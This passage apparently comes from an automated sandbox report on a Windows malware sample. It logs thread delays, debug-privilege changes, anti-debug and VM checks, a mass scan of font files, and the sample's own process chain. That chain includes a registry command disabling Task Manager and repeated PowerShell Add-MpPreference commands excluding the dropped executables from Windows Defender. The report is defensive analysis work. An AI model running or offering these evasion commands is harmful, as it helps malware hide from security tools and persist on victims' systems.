                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 592656Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 592546Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 592436Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 592299Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 100000Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 99990Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 99859Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 99750Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 99641Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 99516Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 99391Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 98651Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 98538Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 98422Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 98313Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 98191Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 98078Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 97969Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 97850Jump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeThread delayed: delay time: 922337203685477
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 922337203685477
                                    Source: C:\webHostnet\MsPortSavesruntime.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exeThread delayed: delay time: 922337203685477
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: MsPortSavesruntime.exe, 00000006.00000002.2065560265.000000001C2FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                    Source: wscript.exe, 00000001.00000002.1888908009.000000000340C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91ef
                                    Source: MsPortSavesruntime.exe, 00000006.00000002.2065833724.000000001C311000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeAPI call chain: ExitProcess graph end nodegraph_0-23948
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0005F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0005F838
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_00067DEE mov eax, dword ptr fs:[00000030h]0_2_00067DEE
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0006C030 GetProcessHeap,0_2_0006C030
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeProcess token adjusted: Debug
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeProcess token adjusted: Debug
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess token adjusted: Debug
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0005F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0005F838
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0005F9D5 SetUnhandledExceptionFilter,0_2_0005F9D5
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0005FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0005FBCA
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_00068EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00068EBD
                                    Source: C:\webHostnet\MsPortSavesruntime.exeMemory allocated: page read and write | page guardJump to behavior

                                    HIPS / PFW / Operating System Protection Evasion

                                    barindex
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\AvdGjRxbXYfvkpkpztF.exe'
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe'
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe'
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\MsPortSavesruntime.exe'
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\AvdGjRxbXYfvkpkpztF.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\MsPortSavesruntime.exe'Jump to behavior
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\webHostnet\zwQVFWlQFNPt4NETL.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\webHostnet\pKNW0LLPvws3GwQKOkochIXVKV43j60Eam3t2s1RnAC4qUIE4HMFCa.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\webHostnet\MsPortSavesruntime.exe "C:\webHostnet/MsPortSavesruntime.exe"Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\AvdGjRxbXYfvkpkpztF.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\AvdGjRxbXYfvkpkpztF.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\webHostnet\MsPortSavesruntime.exe'Jump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\y7jCVExOhX.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe "C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe"
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: 0_2_0005F654 cpuid 0_2_0005F654
                                    Source: C:\Users\user\Desktop\PbfYaIvR5B.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0005AF0F
                                    Source: C:\webHostnet\MsPortSavesruntime.exeQueries volume information: C:\webHostnet\MsPortSavesruntime.exe VolumeInformationJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
